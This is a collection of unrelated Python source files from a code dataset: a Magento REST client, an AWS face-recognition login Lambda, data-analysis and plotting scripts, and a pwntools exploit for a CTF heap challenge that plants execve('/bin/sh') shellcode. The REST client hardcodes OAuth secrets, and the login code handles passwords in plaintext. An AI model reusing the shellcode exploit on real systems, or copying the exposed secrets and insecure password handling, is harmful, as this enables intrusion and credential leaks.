u'7187f89eb898a9b102980f2e60589ca7'\nresource_owner_secret = u'd278e5cf9ff3799cc5b27ea80867e211'\nbaseurl = 'http://www.papelex.com.br/api/rest/'\n\n\ndef my_requests(method_name, url, params=None, data=None):\n global client_key, client_secret, resource_owner_key, resource_owner_secret\n oauth = OAuth(client_key=client_key,\n client_secret=client_secret,\n resource_owner_key=resource_owner_key,\n resource_owner_secret=resource_owner_secret)\n method = getattr(requests, method_name)\n response = method(\n url=str.format('{0}{1}{2}',\n url if baseurl in url else baseurl,\n '' if baseurl[-1] == '/' else '/',\n '' if baseurl in url else url\n ),\n auth=oauth, \n headers = {\n 'Content-Type': 'application/json',\n 'Content_Type': 'application/json', \n 'Accept': 'application/json'\n },\n params=params,\n data=simplejson.dumps(data) if data else None\n )\n if response.status_code == 200:\n try:\n return simplejson.loads(response.text)\n except:\n return response.text\n else:\n return response.text\n\n\ndef parse_filter_identified(filter, simple_operator, operator, index):\n # returns the dict equivalent to: filter[1][attribute]=entity_id&filter[1][neq]=3\n return {'filter[%s][attribute]' % index: filter.split(simple_operator)[0], 'filter[%s][%s]' % (index, operator): filter.split(simple_operator)[1]}\n\n\ndef parse_filter(filter, index):\n possible_operators = {\n '=': 'eq',\n '!=': 'neq',\n '<>': 'neq',\n ' in ': 'in',\n ' not in ': 'nin',\n ' > ': 'gt',\n ' < ': 'lt',\n }\n for simple_operator in possible_operators:\n if simple_operator in filter:\n return parse_filter_identified(filter, simple_operator, possible_operators[simple_operator], index)\n return filter\n\n\ndef parse_filters(filters):\n params = dict()\n for index, filter in enumerate(filters):\n params.update(parse_filter(filter, index+1))\n return params\n\n\ndef read(endpoint, id, params={}, buffer_size=100, debug=False):\n if debug:\n start_time = time()\n items = my_requests('get', endpoint + ('' if endpoint[-1] == '/' else '/') + str(id), params)\n if debug:\n print(time() - start_time)\n return items\n\n\ndef read_all(endpoint, filters=[], params={}, buffer_size=100, maxitems=sys.maxint, debug=False):\n if debug:\n start_time = time()\n result = list()\n page = 1\n prev_items = None\n params.update(parse_filters(filters))\n while 1:\n new_params=dict(page=page, limit=buffer_size)\n params.update(new_params)\n items = my_requests('get', endpoint, params)\n if isinstance(items, dict) and isinstance(items[items.keys()[0]], dict):\n items = items.values()\n if not isinstance(items, list):\n items = list(items)\n if prev_items == items:\n break\n result.extend(items)\n if len(result) >= maxitems:\n break\n page += 1\n prev_items = items\n if len(result) > maxitems:\n result = result[:maxitems]\n if debug:\n print(time() - start_time)\n return result\n\n\ndef update(endpoint, id, filters=[], params={}, data={}, debug=False):\n if debug:\n start_time = time()\n items = my_requests('put', endpoint + ('' if endpoint[-1] == '/' else '/') + str(id), params, data=data)\n if debug:\n print(time() - start_time)\n return items\n","sub_path":"papelex_magento/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"355793920","text":"import boto3\nimport json\n\nakey = \"\"\nskey = \"\"\ncname = \"biometricspoc\"\nbucket = \"biometricspocs3\"\ntable = \"biometricsdynamo\"\n\nrekclient = boto3.client('rekognition', aws_access_key_id = akey, aws_secret_access_key = skey, region_name = 'us-east-1')\ndynamo = boto3.client('dynamodb', aws_access_key_id = akey, aws_secret_access_key = skey, region_name = 'us-east-1')\ns3 = boto3.client('s3', aws_access_key_id = akey, aws_secret_access_key = skey, region_name = 'us-east-1')\n\ndef createCollection(name):\n res = rekclient.create_collection(CollectionId=name)\n return res\n\n\ndef indexFaces(key):\n response = rekclient.index_faces(Image={\"S3Object\":{\"Bucket\":bucket, \"Name\":key,}}, CollectionId=cname, ExternalImageId=key,)\n return response['FaceRecords']\n\n\ndef createImageEntry(data):\n res = dynamo.put_item(TableName=table, Item={'email':{'S':data['email']},'fname':{'S':data['fname']},'lname':{'S':data['lname']}, 'imagename':{'S':data['imagename']},'pwd':{'S':data['pwd']},})\n return res\n\n\ndef searchFacesByImage(name):\n response = rekclient.search_faces_by_image(Image={\"S3Object\":{\"Bucket\":bucket, \"Name\":name,}}, CollectionId=cname, FaceMatchThreshold=80)\n return response\n\n\ndef login(name):\n #upload image to bucket in UI and send name to this function\n #check for match\n import pdb;pdb.set_trace()\n response = searchFacesByImage(name)\n if response['FaceMatches'] == []:\n data = \"Unable to find user\"\n else:\n data = {}\n confidence = int(response['FaceMatches'][0]['Face']['Confidence'])\n #getting data from dynamodb\n res = dynamo.get_item(TableName=\"biometricsdynamo\", Key={'imagename':{'S':response['FaceMatches'][0]['Face']['ExternalImageId']}})\n data['email'] = res['Item']['email']['S']\n data['fname'] = res['Item']['fname']['S']\n data['lname'] = res['Item']['lname']['S']\n data['pwd'] = res['Item']['pwd']['S']\n data['image'] = response['FaceMatches'][0]['Face']['ExternalImageId']\n json.dumps(data)\n #deleting temp image\n s3.delete_object(Bucket=bucket, Key = name)\n return data\n\n\ndef signup(data):\n try:\n #create rekognition mapping here\n res = indexFaces(data['imagename'])\n print(res)\n #create dynamodb entry here\n res2 = createImageEntry(data)\n print(res2)\n return \"Thanks. You are all set\"\n except Exception as e:\n print(e)\n return \"Oops....Please retry\"\n\n\ndef lambda_handler(event, context):\n #collectionName = createCollection(cname)\n #print(collectionName)\n #rekclient.delete_collection(CollectionId=cname)\n\n #sample signup data\n '''data = {}\n data['fname'] = \"Mangalick\"\n data['lname'] = \"Mitra\"\n data['email'] = \"mangalick@deloitte.com\"\n data['pwd'] = \"manmitra123\"\n data['imagename'] =\"mangalick.jpg\"'''\n #res = signup(data)\n #sample login data\n name = \"user4.jpg\"\n res = login(\"login/%s\"%name)\n print(res)\n return res\n\n\n\nlambda_handler(0,0)\n","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"345479245","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/10/2 8:11\n# @Author : WJH\n# @Email : 1226778264@qq.com\n# @File : MoonCake_DataAnalysis.py\n# @Software: PyCharm\nimport os\n\nimport jieba\nimport pandas as pd\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\n# 这是为了解决画图不能显示中文问题\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\ndef data_cleaning(title):\n \"\"\"\n 数据清洗\n\n :param title:爬取的月饼的名称 → 苏式五仁月饼传统手工白皮酥饼馅饼500\n :return:苏式 五仁 传统 手工 白皮 酥饼 馅饼 500\n \"\"\"\n\n # 对每个标题进行分词\n # 将每一个标题,分割为单独的一个个单词\n title_s = []\n for line in tqdm(title):\n title_cut = jieba.lcut(line)\n title_s.append(title_cut)\n # 剔除停用词\n title_clean = []\n stop_words = [\"月饼\", \"礼品\", \"口味\", \"礼盒\", \"包邮\", \"【\", \"】\",\n \"送礼\", \"大\", \"中秋节\", \"中秋月饼\", \"2\", \"饼\", \"蓉\",\n \"多\", \"个\", \"味\", \"斤\", \"送\", \" \", \"老\", \"北京\", \"云南\", \"网红老\"]\n for line in title_s:\n line_clean = []\n for word in line:\n if word not in stop_words:\n line_clean.append(word)\n title_clean.append(line_clean)\n\n # 进行去重, 得到是每一条数据的list\n title_clean_dist = []\n for line in title_clean:\n line_dist = []\n for word in line:\n if word not in line_dist:\n line_dist.append(word)\n title_clean_dist.append(line_dist)\n\n # 获得所有的去重后,剔除停用词的所有关键词\n # 得到的是将所有数据,汇总到一块的数据\n all_words_clean_dist = []\n for line in title_clean_dist:\n for word in line:\n all_words_clean_dist.append(word)\n return all_words_clean_dist, title_clean_dist\n\n\ndef count_sales_to_each_word(df_data_info, word_count, title_clean_dist):\n \"\"\"\n 统计分析每一个关键词对应的销售额\n\n :param df_data_info:总的数据\n :param word_count:关键词数据\n :param title_clean_dist:分完词之后的每一条数据\n :return:\n \"\"\"\n\n w_s_sum = []\n\n for w in tqdm(word_count.word):\n s_list = []\n for i, t in enumerate(title_clean_dist):\n if w in t:\n s_list.append(df_data_info.sales[i])\n\n # 计算包含w的所有的销量之和,比如说 “广州” 一词\n w_s_sum.append(sum(s_list))\n\n df_w_s_sum = pd.DataFrame({'w_s_sum': w_s_sum})\n df_word_sum = pd.concat([word_count, df_w_s_sum], axis=1,\n ignore_index=True)\n df_word_sum.columns = ['word', 'count', 'w_s_sum']\n\n df_word_sum.sort_values('w_s_sum', inplace=True, ascending=True)\n df_w_s = df_word_sum.tail(30)\n x = list(df_w_s['word'].values)\n y = list(df_w_s['w_s_sum'].values)\n\n draw_bar(x, y, '月饼关键词销量分布图', '关键词', (12, 6), False)\n pass\n\n\ndef price_num_distribution(df_data_info):\n \"\"\"\n 统计月饼不同的价格区间,对应的数量\n\n :param df_data_info:月饼数据\n :return:\n \"\"\"\n\n price_info = df_data_info[['price']]\n bins = [0, 10, 50, 100, 150, 200, 300, 500, 1000, 5000, 8000]\n level = ['0-10', '10-50', '50-100', '100-150', '150-200',\n '200-500','500-1000','1000-5000','5000-8000','8000以上']\n\n price_tag = pd.cut(price_info['price'], bins=bins, labels=level).value_counts().sort_index()\n print(price_tag)\n\n attribute = list(price_tag.index)\n values = list(price_tag.values)\n draw_bar(attribute, values, '价格区间&月饼价格对应数量分布', '数量', (9, 6), True)\n pass\n\n\ndef sales_num_distribution(df_data_info):\n \"\"\"\n 统计不同的价格区间的数量\n\n :param df_data_info:月饼数据\n :return:\n \"\"\"\n\n sales_info = df_data_info[['sales']]\n bins = [0, 500, 1000, 3000, 5000, 10000, 30000, 50000, 100000, 200000, 300000]\n level = ['0-500', '500-1000', '1000-3000', '3000-5000', '5000-10000',\n '10000-50000', '50000-100000','100000-200000', '200000-300000', '300000以上']\n\n sales_tag = pd.cut(sales_info['sales'], bins=bins, labels=level).value_counts().sort_index()\n print(sales_tag)\n\n attribute = list(sales_tag.index)\n values = list(sales_tag.values)\n draw_bar(attribute, values, '销售区间&数量分布', '数量', (11, 6), True)\n\n\ndef location_num_distribution(df_data_info):\n se_location = df_data_info.location.value_counts().sort_values() # 按values排序\n\n attribute = list(se_location.index)\n values = list(se_location.values)\n draw_bar(attribute, values, '产地&数量分布', '数量', (11, 6), True)\n pass\n\n\ndef draw_word_cloud(content_dist, save_picture_name):\n \"\"\"\n 绘制词云图\n\n :param content_dist:单词和词频\n :param save_picture_name: 保存词云的名称\n :return: None\n \"\"\"\n\n # 词云图背景\n background_image = plt.imread('1.png')\n wc = WordCloud(width=1024, height=768, background_color='white',\n mask=background_image, font_path='simkai.ttf',\n max_font_size=400, random_state=50)\n\n # 根据单词和词频,创建词云图\n wc = wc.fit_words({x[0]: x[1] for x in word_count.head(100).values})\n plt.imshow(wc, interpolation='bilinear')\n plt.axis('off')\n # plt.show()\n # 保存图片\n d = os.path.dirname(__file__)\n wc.to_file(os.path.join(d, '{}.png'.format(save_picture_name)))\n\n\ndef draw_bar(x_attribute, y_value, title, legend_name, figure_size, is_label=False):\n \"\"\"\n 绘制柱状图\n\n :param x_attribute:x轴内容\n :param y_value:y轴内容\n :param title:标题\n :param legend_name:图例名称\n :param is_label:是否给每一个柱状图添加数字标注\n :return:\n \"\"\"\n\n fig = plt.figure(figsize=figure_size)\n plt.bar(x_attribute, y_value, width=0.5, color=\"green\", label=legend_name)\n plt.grid(axis='y')\n x_index = [float(i) for i in range(len(x_attribute))]\n plt.xticks(x_index, x_attribute, size='small', rotation=30)\n\n # 加柱状图顶部标注\n if is_label:\n for a, b in zip(x_attribute, y_value):\n plt.text(a, b + 0.001, '%.1f' % b, ha='center', va='bottom', fontsize=9)\n\n plt.title(title)\n plt.legend()\n # plt.show()\n current_path = os.path.join(os.getcwd(), title + '.jpg')\n plt.savefig(current_path)\n\n\nif __name__ == '__main__':\n\n # step 1: 读取数据\n f = open('MoonCakeData.csv', encoding='utf-8')\n df = pd.read_csv(f, sep=',', names=['title', 'price', 'sales', 'location'])\n\n print(df.describe())\n\n title = df.title.values.tolist()\n\n # step 2: 数据清洗\n all_words_clean_dist, title_clean_dist = data_cleaning(title)\n\n # step 3: 绘制词云图\n\n # 对过滤,去重词语进行汇总统计\n df_all_words_clean_dist = pd.DataFrame({'all_words': all_words_clean_dist})\n # 统计每个单词出现次数\n word_count = df_all_words_clean_dist.all_words.value_counts().reset_index()\n word_count.columns = ['word', 'count']\n draw_word_cloud(all_words_clean_dist, 'Moon Cake')\n\n # step 4: 统计分析每一个关键词对应的销售额\n count_sales_to_each_word(df, word_count, title_clean_dist)\n\n # step 5: 价格区间&月饼价格对应数量分布\n price_num_distribution(df)\n\n # step 6: 销售区间&数量分布\n sales_num_distribution(df)\n\n # step 7: 统计不同产地月饼的销售情况\n location_num_distribution(df)\n\n\n","sub_path":"AnalysisMoonCake/MoonCake_DataAnalysis.py","file_name":"MoonCake_DataAnalysis.py","file_ext":"py","file_size_in_byte":7606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"523265593","text":"import turtle # python needs this to use all the turtle functions\nturtle.shape('turtle') # changes the shape to a turtle\nfinn = turtle.clone() # creates new turtle and saves it in finn\nfinn.shape('square') # changes shape of 2nd turtle to square\n\nfinn.goto(100,100) # moves square to (x=100,y=100)\nfinn.pendown()\n\n\nfinn.forward(100)\nfinn.left(90)\nfinn.forward(100)\nfinn.left(90)\nfinn.forward(100)\nfinn.left(90)\nfinn.forward(100)\nfinn.left(90)\n\ncharlie = turtle.clone()\ncharlie.shape('triangle')\n\ncharlie.goto(50,100)\ncharlie.goto(100,0)\ncharlie.goto(0,0)\n\nfinn.goto(300,300)\nfinn.stamp()\nfinn.goto(100,100)\n\ncharlie.goto(-300,-300)\ncharlie.stamp()\ncharlie.goto(0,0)\n","sub_path":"funturtle.py","file_name":"funturtle.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"46126896","text":"from pwn import *\n\np = process(\"./task_note_service2\")\n#p = remote(\"117.78.43.127\",32059)\ncontext.log_level = 'debug'\n\ndef add(index, size, content):\n p.recvuntil(\"your choice>> \")\n p.sendline(\"1\")\n p.recvuntil(\"index:\")\n p.sendline(str(index))\n p.recvuntil(\"size:\")\n p.sendline(str(size))\n p.recvuntil(\"content:\")\n\n p.sendline(content)\n\ndef delete(index):\n p.recvuntil(\"your choice>> \")\n p.sendline(\"4\")\n p.recvuntil(\"index:\")\n p.sendline(str(index))\n\ndef exit():\n p.recvuntil(\"your choice>> \")\n p.sendline(\"5\")\n\noffset = 17\nadd(-17, 8, \"\\x48\\x31\\xc0\\x50\\xeb\\x1a\") # xor rax, rax push rax\nadd(0, 8, \"\\x48\\x31\\xf6\\x53\\xeb\\x1a\") #xor rsi, rsi push rbx\ngdb.attach(p)\nadd(1, 8, \"\\xbb\\x2f\\x62\\x69\\x6e\\xeb\\x19\") #mov rbx, 0x6e69622f\nadd(2, 8, \"\\x48\\x89\\x1c\\x24\\xeb\\x1a\") #mov [rsp], rbx\nadd(3, 8, \"\\xbb\\x2f\\x2f\\x73\\x68\\xeb\\x19\") #mov rbx, 0x68732f2f \nadd(4, 8, \"\\x48\\x89\\x5c\\x24\\x04\\xeb\\x19\") #mov [rsp+4], rbx\nadd(5, 8, \"\\x54\\x5f\\x5b\\x5e\\xeb\\x1a\") #push rsp pop rdi pop rbx pop rsi\nadd(6, 8, \"\\xb0\\x3b\\x0f\\x05\") #mov al, 0x3b syscall\ndelete(2)\n#log.info(\"execve shellcode\")\np.interactive()\n","sub_path":"2018/National/pwn/note_service/exp01.py","file_name":"exp01.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"374979355","text":"# -*- coding: utf-8 -*-\n# @StartTime : 2018/5/13 21:17\n# @EndTime : 2018/5/13 21:17\n# @Author : Andy\n# @Site : \n# @File : 180513jump_game.py\n# @Software: PyCharm\n\"\"\"\nGiven an array of non-negative integers, you are initially positioned at the first index of the array.\n\nEach element in the array represents your maximum jump length at that position.\n\nDetermine if you are able to reach the last index.\n\nExample 1:\n\nInput: [2,3,1,1,4]\nOutput: true\nExplanation: Jump 1 step from index 0 to 1, then 3 steps to the last index.\nExample 2:\n\nInput: [3,2,1,0,4]\nOutput: false\nExplanation: You will always arrive at index 3 no matter what. Its maximum\n jump length is 0, which makes it impossible to reach the last index.\n\"\"\"\n\n#\n# class Solution(object):\n# def canJump(self, nums):\n# \"\"\"\n# :type nums: List[int]\n# :rtype: bool\n# \"\"\"\n# size = len(nums)\n# count = 0\n# index = size - 1\n# while 1:\n# if index == 0:\n# return True\n# for j in range(index - 1, -1, -1):\n# if (nums[j] + j) >= index:\n# index = j\n# break\n# if j == 0:\n# count += 1\n# if count == size:\n# return False\n\n\nclass Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n size = len(nums)\n index = size - 1\n for i in range(index)[::-1]:\n if i + nums[i] >= index:\n index = i\n return not index\n\n\n\nSo = Solution()\nprint(So.canJump([2,0]))\nprint(So.canJump([2,3,1,1,4]))","sub_path":"LeetCode/17/180513jump_game.py","file_name":"180513jump_game.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"9026258","text":"\"\"\"Media - MODEL\n\n\"\"\"\nfrom sqlalchemy import Column, String, Text, DateTime, Integer, UniqueConstraint\n\nfrom app.models.base import Base\n\n\nclass Media(Base):\n\n __tablename__ = 'media'\n\n url = Column(String(500), nullable=False)\n file = Column(String(200))\n description = Column(Text())\n content_type = Column(String(50))\n domain = Column(String(50))\n author = Column(String(200))\n media_created = Column(DateTime)\n file_size = Column(Integer)\n score = Column(Integer)\n downloaded = Column(Integer)\n\n __table_args__ = (\n UniqueConstraint('url', 'file', name='uix_1'),\n )\n\n def __init__(self, _id=None):\n if _id:\n self.id = _id\n c = self.query.filter(Media.id == self.id).one()\n if c:\n self.__build_obj__(c)\n\n def __build_obj__(self, obj):\n self.id = int(obj.id)\n self.ts_created = obj.data\n self.ts_updated = obj.ts_updated\n self.url = obj.url\n self.file = obj.file\n self.description = obj.description\n self.content_type = obj.content_type\n self.domain = obj.domain\n self.author = obj.author\n self.media_created = obj.media_created\n self.l_url = \"content/%s.%s\" % (self.file, self.content_type)\n","sub_path":"app/models/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"437951905","text":"\"\"\"\nClass containing routines for handling of Segy Shot gathers\n-----------------------------------------------------------\n\n\"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport segyio\n\n\ndef rotate(x, y, ox, oy, angle):\n\t\"\"\"\n\tApply rotation matrix as in https://en.wikipedia.org/wiki/Rotation_matrix\n\n\t:param\tnp.ndarrray x: \t\t x-coordinates\n\t:param\tnp.ndarrray y: \t\t y-coordinates\n\t:param\tfloat \t ox: \t x-origin\n\t:param\tfloat \t oy: \t y-origin\n\t:param\tfloat angle: \t rotation angle (as taken from x-axis)\n\t:param\tbool positive: \timpose positive axis\n\t\"\"\"\n\txrot , yrot = ((x-ox)*np.cos(angle) - (y-oy)*np.sin(angle)) , ((x-ox)*np.sin(angle) + (y-oy)*np.cos(angle))\n\treturn xrot , yrot\n\n\nclass SegyShot:\n\t\n\tdef __init__(self, filename, components=['P']):\n\t\t\"\"\"\n\t Class for manipulating single Segy file with Shot gather configuration\n\n\t filename: Name of file to read\n\t components: List of components recorded in data (data is assumed to be have consecutive traces representing different components)\n\n\t Returns: a SegyShot object\n\t\t\"\"\"\n\t\tself.filename = filename\n\t\tself.components = components\n\t\tself.ncomponents = len(components)\n\n\t\twith segyio.open(filename, \"r\", ignore_geometry=True) as sgy:\n\t\t\tself.ntraces_per_shot = sgy.bin[segyio.BinField.Traces]\n\t\t\tself.nrec = self.ntraces_per_shot // self.ncomponents\n\t\t\tself.nsrc = sgy.tracecount // self.ntraces_per_shot\n\t\t\tself.nt = sgy.bin[segyio.BinField.Samples]\n\t\tself.selected_rec = np.arange(self.nrec)\n\t\tself.selected_src = np.arange(self.nsrc)\n\n\tdef interpret(self):\n\t\t\"\"\"\n\t\tInterpret Segy shot file\n\n\t\t:param \n\t\t:return: Geometry as part of object\n\t\t\"\"\"\n\t\t\n\t\twith segyio.open(self.filename, \"r\", ignore_geometry=True) as sgy:\n\t\t\t\n\t\t\tself.t = sgy.samples/1000\n\t\t\tself.dt = self.t[1] - self.t[0]\n\t\t\tself.sc = sgy.header[0][segyio.TraceField.SourceGroupScalar]\n\t\t\tif (self.sc<0):\n\t\t\t\tself.sc=1./abs(self.sc)\n\t\t\n\t\t\tself.recx = self.sc * sgy.attributes(segyio.TraceField.GroupX)[:self.nrec*self.ncomponents:self.ncomponents]\n\t\t\tself.recy = self.sc * sgy.attributes(segyio.TraceField.GroupY)[:self.nrec*self.ncomponents:self.ncomponents]\n\t\t\tself.recz = self.sc * sgy.attributes(segyio.TraceField.GroupWaterDepth)[:self.nrec*self.ncomponents:self.ncomponents]\n\n\t\t\tself.srcx = self.sc * sgy.attributes(segyio.TraceField.SourceX)[::self.nrec*self.ncomponents]\n\t\t\tself.srcy = self.sc * sgy.attributes(segyio.TraceField.SourceY)[::self.nrec*self.ncomponents]\n\t\t\tself.srcz = self.sc * sgy.attributes(segyio.TraceField.SourceDepth)[::self.nrec*self.ncomponents]\n\n\tdef showgeometry(self, local=False, figsize=(10, 10), newfig=True):\n\t\t\"\"\"\n\t\tVisualize geometry\n\n\t\t:param\tlocal: \t\tLocal or global geometry\n\t\t:param\tfigsize: \tFigure size \n\t\t:param\tnewfig: \tCreate new figure or not\n\n\t\t\"\"\"\n\t\tif local:\n\t\t\trecx, recy = self.recx_local , self.recy_local\n\t\t\tsrcx, srcy = self.srcx_local , self.srcy_local\n\t\telse:\n\t\t\trecx, recy = self.recx , self.recy\n\t\t\tsrcx, srcy = self.srcx , self.srcy\n\n\t\tif newfig==True:\n\t\t\tplt.figure(figsize=figsize)\n\t\t\tplt.scatter(srcx, srcy, c=np.arange(self.nsrc), cmap='jet', s=1, label='src')\n\t\t\tplt.scatter(srcx[self.selected_src], srcy[self.selected_src], color='r', s=20, label='selected src')\n\t\t\tplt.scatter(recx, recy, color='b', s=1, label='rec')\n\t\t\tplt.scatter(recx[self.selected_rec], recy[self.selected_rec], color='b', s=20, label='selected rec')\n\t\t\tplt.legend()\n\n\t\telse:\n\t\t\tplt.scatter(srcx, srcy, s=1, color='r', label='src')\n\t\t\tplt.scatter(srcx[self.selected_src], srcy[self.selected_src], color='r', s=20, label='selected src')\n\t\t\tplt.scatter(recx, recy, s=1, color='b', label='rec')\n\t\t\tplt.scatter(recx[self.selected_rec], recy[self.selected_rec], s=20, color='b', label='selected rec')\n\t\t\tplt.legend()\n\t\n\tdef rotategeometry(self, velfile, plotflag=0):\n\t\t\"\"\"\n\t\tRotate geometry\n\n\t\t:param\tvelfile: \tFilename of velocity model to use for rotation\n\t\t:param\tplotflag: \tPlot intermediate results\n\t\t\"\"\"\n\t\t# read velocity file\n\t\twith segyio.open(velfile, \"r\") as vel:\n\n\t\t\tscvel = vel.header[0][segyio.TraceField.SourceGroupScalar]\n\t\t\tif (scvel<0):\n\t\t\t\tscvel=1./abs(scvel)\n\t\t\txvel , yvel = scvel * vel.attributes(segyio.TraceField.CDP_X)[:] , scvel * vel.attributes(segyio.TraceField.CDP_Y)[:]\n\n\t\t\toxvel, oyvel = scvel * vel.attributes(segyio.TraceField.CDP_X)[0], scvel * vel.attributes(segyio.TraceField.CDP_Y)[0]\n\t\t\toxvel1, oyvel1 = scvel * vel.attributes(segyio.TraceField.CDP_X)[len(vel.xlines)-1] , scvel * vel.attributes(segyio.TraceField.CDP_Y)[len(vel.xlines)-1]\n\n\t\t\t# find and apply rotation\n\t\t\trot, ox, oy = segyio.tools.rotation(vel, line='fast')\n\t\t\tself.ox, self.oy = scvel * ox , scvel * oy\n\t\t\tself.rot = (rot - np.pi/2)\n\n\t\t\txvel_local, yvel_local = rotate(xvel, yvel, self.ox, self.oy, self.rot)\n\t\t\toxvel_local, oyvel_local = rotate(oxvel, oyvel, self.ox, self.oy, self.rot)\n\t\t\toxvel1_local, oyvel1_local = rotate(oxvel1, oyvel1, self.ox, self.oy, self.rot)\n\n\t\t\tself.srcx_local, self.srcy_local = rotate(self.srcx, self.srcy, self.ox, self.oy, self.rot)\n\t\t\tself.recx_local, self.recy_local = rotate(self.recx, self.recy, self.ox, self.oy, self.rot)\n\t\t\n\t\t\t# identify local regular axis\n\t\t\txextent = np.max(xvel_local) - np.min(xvel_local)\n\t\t\tyextent = np.max(yvel_local) - np.min(yvel_local)\n\t\t\tdx = xextent/len(vel.xlines)\n\t\t\tdy = yextent/len(vel.ilines)\n\n\t\t\tprint('Local regular axis:\\n ox=%f, dx=%f nx=%d\\n oy=%f, dy=%f ny=%d' \n % (oxvel_local, dx, len(vel.xlines), oyvel_local, dy, len(vel.ilines)))\n\n\t\t\tif(plotflag == 1):\n\t\t\t\tplt.figure()\n\t\t\t\tplt.scatter(xvel, yvel, color='k', label='Velocity model')\n\t\t\t\tplt.scatter(self.recx, self.recy, color='b',label='rec')\n\t\t\t\tplt.scatter(self.srcx, self.srcy, color='r',label='src')\n\t\t\t\tplt.scatter(oxvel, oyvel, color='c', label='IL=0, XL=0')\n\t\t\t\tplt.scatter(oxvel1, oyvel1, color='y', label='IL=0, XL=end')\n\t\t\t\tplt.legend()\t\t\t\t\n\n\t\t\t\tplt.figure()\n\t\t\t\tplt.scatter(xvel_local, yvel_local, color='k', label='Velocity model')\n\t\t\t\tplt.scatter(self.recx_local, self.recy_local, color='b',label='rec')\n\t\t\t\tplt.scatter(self.srcx_local, self.srcy_local, color='r',label='src')\n\t\t\t\tplt.scatter(oxvel_local, oyvel_local, color='c', label='IL=0, XL=0')\n\t\t\t\tplt.scatter(oxvel1_local, oyvel1_local, color='y', label='IL=0, XL=end')\n\t\t\t\tplt.legend()\n\n\t\t\treturn dx, len(vel.xlines), dy, len(vel.ilines)\t\n \n\tdef resetrecs(self):\n\t\t\"\"\"\n\t\tReset selection subset of receivers\n \"\"\"\n\t\tself.selected_rec = np.arange(self.nrec)\n\n\tdef resetsrcs(self):\n\t\t\"\"\"\n\t\tReset selection subset of sources\n \"\"\"\n\t\tself.selected_src = np.arange(self.nsrc)\n\n\tdef selectrecs(self, start=0, end=-1, plotflag=0):\n\t\t\"\"\"\n\t\tSelect subset of receivers\n\n\t\t:param\tstart: index of first receiver to select\n\t\t:param\tend: index of last receiver to select\n\t\t:param\tplotflag: plot intermediate results\n\t\t\"\"\"\n\t\tself.resetrecs()\n\t\tif end == -1:\n\t\t\tend = self.nrec\n\n\t\tself.selected_rec = self.selected_rec[start:end]\n\n\t\tif(plotflag==1):\n\t\t\tself.showgeometry()\n\t\t\tplt.legend()\n\n\tdef selectsrcs(self, start=0, end=-1, plotflag=0):\n\t\t\"\"\"\n\t\tSelect subset of sources\n\n\t\t:param\tstart: index of first receiver to select\n\t\t:param\tend: index of last receiver to select\n\t\t:param\tplotflag: plot intermediate results\n\t\t\"\"\"\n\t\tself.resetsrcs()\n\t\tif end == -1:\n\t\t\tend = self.nsrc\n\n\t\tself.selected_src = self.selected_src[start:end]\n\n\t\tif(plotflag==1):\n\t\t\tself.showgeometry()\n\t\t\tplt.legend()\n\n\tdef get_shotgather(self, isrc):\n\t\t\"\"\"\n\t\tRetrieve shot gather\n\n\t\t:param\tisrc: index of source\n\t\t\"\"\"\n\t\twith segyio.open(self.filename, \"r\", ignore_geometry=True) as sgy:\n\t\t d = segyio.collect(sgy.trace[isrc*self.ntraces_per_shot:(isrc+1)*self.ntraces_per_shot])\n\t\tshot = {component: d[ic::self.ncomponents] for ic, component in enumerate(self.components) }\n\t\treturn shot\n\n\n","sub_path":"developement/segyshot.py","file_name":"segyshot.py","file_ext":"py","file_size_in_byte":7798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"96880735","text":"import os\nimport random\nimport sys\nimport wx\n\nimport matplotlib\nmatplotlib.use('WXAgg')\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import \\\n FigureCanvasWxAgg as FigCanvas, \\\n NavigationToolbar2WxAgg as NavigationToolbar\nimport numpy as np\nimport pylab\n\nfrom datagen import DataGen\n# from boundcontrolbox import BoundControlBox\n\nUPDATING_SEQUENTIAL = 0\nUPDATING_CSEQUENTIAL = 1\nUPDATING_SYNCHRONOUS = 2\n\nVIEW_MODE_ALL = 0\nVIEW_MODE_FOLLOW = 1\n\nclass GraphFrame(wx.Frame):\n title = 'Magnetizr'\n time_step = 100 # 100ms\n def __init__(self):\n wx.Frame.__init__(self, None, -1, self.title, size=(1230,610))\n\n self.datagen = DataGen()\n self._data = [self.datagen.initialise()]\n self.paused = True\n self.running = False\n\n self.plot_view = VIEW_MODE_ALL\n self.follow_last = 10 # lines\n\n self.create_menu() # shortcuts\n self.create_status_bar() # line at the bottom\n\n self.MainGrid = wx.FlexGridSizer( 2, 2, 0, 0 )\n self.init_plot() # \"the drawing place\"\n self.draw_interface() # controls\n\n self.redraw_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.on_redraw_timer, self.redraw_timer)\n self.redraw_timer.Start(self.time_step)\n\n def create_menu(self):\n self.menubar = wx.MenuBar()\n menu_file = wx.Menu()\n m_expt = menu_file.Append(-1, \"&Save plot\\tCtrl-S\", \"Save plot to file\")\n self.Bind(wx.EVT_MENU, 